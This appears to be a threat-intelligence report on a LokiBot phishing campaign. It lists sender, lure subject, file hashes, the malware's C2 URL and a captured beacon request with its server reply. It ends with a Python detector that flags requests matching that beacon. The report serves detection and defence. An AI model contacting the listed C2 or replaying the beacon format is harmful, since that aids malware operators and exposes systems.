- THREAT IDENTIFICATION: LOKIBOT
- SUBJECTS OBSERVED
  - Richiesta di quotazione
- SENDERS OBSERVED
  - caterina.ciambrone@alteaenergia.com
- MALDOC FILE HASHES
  - Richiesta di quotazione.gz
    - 6ea1f325962183bb76eb910bba5d8083
- LOKIBOT PAYLOAD FILE HASHES
  - ConsoleApp2.exe
    - 329693bf1fce73c334b98dedce191db1
  - Renamed and copied to AppData\Roaming\17E4D9
  - 97071E.exe
    - 329693bf1fce73c334b98dedce191db1
- LOKIBOT C2
  - http://avatar.ps/modules/five/fre.php
- C2 PACKET CONTENTS
  - LOKIBOT C2 PACKET (request)
    - POST /modules/five/fre.php HTTP/1.0
    - User-Agent: Mozilla/4.08 (Charon; Inferno)
    - Host: avatar.ps
    - Accept: */*
    - Content-Type: application/octet-stream
    - Content-Encoding: binary
    - Content-Key: DA6FF4FE
    - Content-Length: 149
    - Connection: close
  - C2 RESPONSE
    - HTTP/1.1 200 OK
    - Date: Thu, 12 Aug 2021 20:54:09 GMT
    - Server: Apache
    - Upgrade: h2,h2c
    - Connection: Upgrade, close
    - Content-Length: 23
    - Content-Type: text/html; charset=UTF-8
    - ........File not found.
- SUPPORTING EVIDENCE
  - https://www.virustotal.com/gui/file/9b83e59783b63981f9f85b2939e038531deb96457d91d5d8debc93f396a15272/detection
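The captured beacon above has traits a network detection can key on: the fixed "Mozilla/4.08 (Charon; Inferno)" User-Agent, the non-standard Content-Key header, and a binary POST to a .php gate. The following is an added example, not code from the original paste, that parses raw HTTP requests and reports which of those traits are present; the sample traffic is constructed here (the first request mirrors the packet above, the second is benign), and the host list holds only the C2 named on this page.

```python
"""Flag HTTP requests matching the LokiBot C2 beacon captured above."""
from typing import Dict, List, Tuple

# Indicators taken from the captured request on this page.
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
LOKIBOT_C2_HOSTS = {"avatar.ps"}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, lowercase-keyed headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def lokibot_indicators(raw: str) -> List[str]:
    """Return the LokiBot C2 traits present in one request (empty if none)."""
    method, path, h = parse_request(raw)
    hits: List[str] = []
    if h.get("user-agent") == LOKIBOT_USER_AGENT:
        hits.append("charon-inferno user-agent")
    if "content-key" in h:  # non-standard header carrying the bot's key
        hits.append("content-key header")
    if method == "POST" and path.endswith(".php") \
            and h.get("content-type") == "application/octet-stream":
        hits.append("binary POST to php gate")
    if h.get("host", "").lower() in LOKIBOT_C2_HOSTS:
        hits.append("known C2 host")
    return hits


# Constructed samples: the first mirrors the packet above, the second is benign.
SAMPLE_BEACON = (
    "POST /modules/five/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: avatar.ps\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: DA6FF4FE\r\n"
    "Content-Length: 149\r\n"
    "Connection: close\r\n\r\n"
)
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.com\r\n\r\n"
```

A single matching trait (especially the User-Agent or Content-Key header) is enough to warrant triage; the host check only confirms the specific C2 from this report and will not catch new infrastructure.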